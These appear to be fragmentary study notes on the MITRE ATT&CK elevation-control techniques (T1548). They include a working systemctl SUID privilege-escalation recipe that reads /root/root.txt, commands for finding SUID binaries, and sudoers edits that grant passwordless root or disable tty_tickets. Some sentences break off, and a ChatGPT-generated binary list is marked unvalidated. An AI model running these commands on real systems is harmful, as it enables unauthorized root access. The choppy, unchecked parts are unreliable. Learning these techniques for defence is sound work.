Linux & macOS
Platforms: macOS, Linux MITRE: https://attack.mitre.org/techniques/T1548/001/
setgid bits set in UNIX.
chmod u+s [file] or
chmod 4777 [file] to set the bit. To enable the setgid bit,
chmod 2775 and
chmod g+s can be used. Look for the files with the bit set:
find / -perm +4000 2>/dev/null and
find / -perm +2000 2>/dev/null for the
When a user runs an executable file with the setuid bit set, the real user ID (RUID) of the process is set to the user ID of the user who ran the file, while the effective user ID (EUID) is set to the user ID of the file owner. This means that the process runs with the privileges of the file owner while still retaining the identity of the user who executed the file.
One of the files with this bit set is systemctl. This process is used to start services, for example, an apache server:
sudo systemctl start apache2. However, if this file is assigned SUID permissions by mistake, it can be used for privilege escalation.
eop=$(mktemp).service # create a temp file with a random unique name and store the name in a eop variable echo '[Service] > ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output" > [Install] > WantedBy=multi-user.target' > $eop # write the config for the service into the file. This unit file will be used by the systemctl to run the process specified in the ExecStart variable. # ❗️ Do not copy this code in whole, line by line without the > sign, or else you will not get it work # ❗️ I have added touch $eop but it's not required (it was in my case, cause I had an error) /bin/systemctl link $eop # This command in Linux creates a symbolic link for the service file specified in the "$eop" environment variable, in the "/etc/systemd/system/" directory, using the systemctl utility. The link created allows the service to be managed with systemctl commands. /bin/systemctl enable --now $eop # This command in Linux enables and starts the service specified in the "$eop" environment variable, using the systemctl utility. The "enable" option makes the service to start at boot time, while the "--now" option starts the service immediately after the command is executed.
Below is the list generated by ChatGTP (to validate) that shows other executables with this bit set that are potentially useful to the attacker:
/usr/bin/passwd: Used to change user passwords. A vulnerability in this file could allow an attacker to gain root privileges. /usr/bin/chsh: Used to change a user's default shell. A vulnerability in this file could allow an attacker to gain root privileges. /usr/bin/chfn: Used to change a user's finger information. A vulnerability in this file could allow an attacker to gain root privileges. /usr/bin/sudo: Used to run commands as another user, typically root. A vulnerability in this file could allow an attacker to gain root privileges. /usr/bin/sudoedit: Used to edit files as another user, typically root. A vulnerability in this file could allow an attacker to gain root privileges.
Mitigation: Don’t set this bit on binaries with known shell escape vulnerabilities.
Platforms: macOS, Linux MITRE: https://attack.mitre.org/techniques/T1548/003/
One can add
admin ALL=(ALL) NOPASSWD: ALL to the
Also, malware might monitor
/var/db/sudo file for the timestamp and execurte when possible.
Also, it’s possible to disable terminal windows isolation, like this:
echo \'Defaults !tty_tickets\' >> /etc/sudoers.
Platforms: macOS MITRE: https://attack.mitre.org/techniques/T1548/004/
AuthorizationExecuteWithPrivileges API (macOS). Set the preferences to block all programs not downloaded from AppStore. Basically, it brings a prompt and asks the user to grant the permissions. The trick is to be convincing enought so that the user grants the permissions.
Mitigations: least privilege, proper configuration, defense in-depth, zero trust.
Platforms: Windows MITRE: https://attack.mitre.org/techniques/T1548/002/
Abusing UAC on Windows.